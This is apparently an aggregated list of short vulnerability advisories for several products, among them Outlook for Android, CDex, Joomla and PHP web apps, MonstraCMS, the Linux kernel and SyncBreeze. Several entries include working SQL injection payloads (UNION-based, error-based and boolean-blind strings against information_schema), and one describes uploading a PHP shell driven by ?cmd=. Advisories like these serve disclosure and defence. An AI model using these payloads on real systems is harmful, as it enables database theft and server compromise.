There is a directory traversal issue in attachment downloads in Outlook for Android. There is no path sanitization on the attachment filename in the app. If the email account is a Hotmail account, this will be sanitized by the server, but for other accounts it will not be. This allows a file to be written anywhere on the filesystem that the Outlook app can access when an attached image is viewed in the Outlook app.
CDex 1.96 (Unicode Build) is vulnerable to a local stack buffer overflow. An attacker can exploit this vulnerability by generating a crash.txt file, opening the application, going to options, settings, encoding, tags, and pasting the crash.txt contents in the picture text. This will cause the application to crash, resulting in a pointer to the next SEH record and no unicode ppr pointers.
The vulnerability allows an attacker to inject sql commands into the 'promocode' parameter of the 'guruBuy' script, which can be used to extract information from the database.
The vulnerability allows an attacker to inject sql commands. Proof of Concept: http://localhost/[PATH]/index.php?option=com_bookpro&view=popup&visatype=[SQL] 259999%20AND(SELECT%201%20FROM%20(SELECT%20COUNT(*)%2cCONCAT((SELECT(SELECT%20CONCAT(CAST(DATABASE()%20AS%20CHAR)%2c0x7e%2c0x496873616e53656e63616e))%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200%2c1)%2cFLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)
The vulnerability allows an attacker to inject sql commands. Proof of Concept: 1) http://localhost/[PATH]/pub_post.php?bgid=[SQL]&fmid=[SQL] -7+UNION%20SELECT+0x253331%2c0x253332%2c0x253333%2c0x253334%2c0x253335%2c0x253336%2c0x253337%2c0x253338%2c%39%2c0x253331253330%2c0x253331253331%2c0x253331253332%2c0x253331253333%2c0x253331253334%2c0x253331253335%2c0x253331253336%2c0x253331253337%2c0x253331253338%2c0x253331253339%2d%2d%20%2d. Parameter: bgid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: bgid=1 AND 9841=9841&fmid=7 Parameter: fmid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: bgid=1&fmid=7 AND 2056=2056 2) http://localhost/[PATH]/pub_openpic.php?bgid=[SQL]&fmid=[SQL]&fnid=[SQL] Parameter: fnid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: bgid=2&fmid=10&fnid=12 AND 1592=1592 Parameter: fmid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: bgid=2&fmid=10 AND 3227=3227&fnid=12 Parameter: bgid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: bgid=2 AND 6608=6608&fmid=10&fnid=12 3) http://localhost/[PATH]/album.php?bgid=[SQL]&fmid=[SQL] Parameter: fmid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: bgid=2&fmid=10 AND 9273=9273 Parameter: bgid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: bgid=2 AND 8072=8072&fmid=10
MonstraCMS 3.0.4 allows users to upload arbitrary files which leads to a remote command execution on the remote server. An attacker can upload a file with a PHP extension containing malicious code and execute system commands by adding ?cmd= to the URL.
The injection required user registration on CIUS CRM. Old versions have not been tested but it's a guess, they are also vulnerable. The URL path filename appears to be vulnerable to SQL injection attacks. The payload 65079277 or 7647=07647 was submitted in the URL path filename, and a database error message was returned.
The vulnerability allows an attacker to inject sql commands.... Proof of Concept: 1) http://localhost/[PATH]/index.php?md=[SQL] %2dV'%20%20%2f*!02222UNION*%2f(%2f*!02222SELECT*%2f%200x253238253331253239%2c0x253238253332253239%2c(%2f*!02222Select*%2f%20export_set(5%2c@:=0%2c(%2f*!02222select*%2f%20count(*)%2f*!02222from*%2f(information_schema.columns%29where@:=export_set(5%2cexport_set(5%2c@%2c%2f*!02222table_name*%2f%2c0x3c6c693e%2c2)%2c%2f*!02222column_name*%2f%2c0xa3a%2c2))%2c@%2c2))%2c0x253238253334253239%2c0x253238253335253239%2c0x253238253336253239%2c0x253238253337253239%2c0x253238253338253239%2c0x253238253339253239%2c0x253238253331253330253239%2c0x253238253331253331253239%2c0x253238253331253332253239)%2d%2d%20%2d 2) http://localhost/[PATH]/index.php?pid=minfo&Movie_Id=[SQL] %2dV'%20%20%2f*!02222UNION*%2f(%2f*!02222SELECT*%2f%200x253238253331253239%2c0x253238253332253239%2c(%2f*!02222Select*%2f%20export_set(5%2c@:=0%2c(%2f*!02222select*%2f%20count(*)%2f*!02222from*%2f(information_schema.columns%29where@:=export_set(5%2cexport_set(5%2c@%2c%2f*!02222table_name*%2f%2c0x3c6c693e%2c2)%2c%2f*!02222column_name*%2f%2c0xa3a%2c2))%2c@%2c2))%2c0x253238253334253239%2c0x253238253335253239%2c0x253238253336253239%2c0x253238253337253239%2c0x253238253338253239%2c0x253238253339253239%2c0x253238253331253330253239%2c0x253238253331253331253239%2c0x253238253331253332253239)%2d%2d%20%2d 3) http://localhost/[PATH]/index.php?director=[SQL] a'%20%20%2f*!02222UNION*%2f(%2f*!02222SELECT*%2f%200x253238253331253239%2c0x253238253332253239%2c(%2f*!0222Select*%2f%20export_set(5%2c@:=0%2c(%2f*!02222select*%2f%20count(*)%2f*!02222from*%2f(information_schema.columns%29where@:=export_set(5%2cexport_set(5%2c@%2c%2f*!02222table_name*%2f%2c0x3c6c693e%2c2)%2c%2f*!02222column_name*%2f%2c0xa3a%2c2))%2c@%2c2))%2c0x253238253334253239%2c0x253238253335253239%2c0x253238253336253239%2c0x253238253337253239%2c0x253238253338253239%2c0x253238253339253239%2c0x253238253331253330253239%2c0x253238253331253331253239%2c0x253238253331253332253239)%2d%2d%20%2d
This PoC triggers a Use-After-Free (UAF) vulnerability in the Linux kernel version 4.10. The vulnerability is caused by a race condition between two threads, one that adds a timerfd and one that deletes it. The race condition can be exploited to cause a UAF, which can be used to gain arbitrary code execution.
The Enterprise version of SyncBreeze is affected by a Remote Denial of Service vulnerability. The web server does not check bounds when reading server request in the Host header on making a connection, resulting in a classic Buffer Overflow that causes a Denial of Service. To exploit the vulnerability only is needed use the version 1.1 of the HTTP protocol to interact with the application.
Services By CQR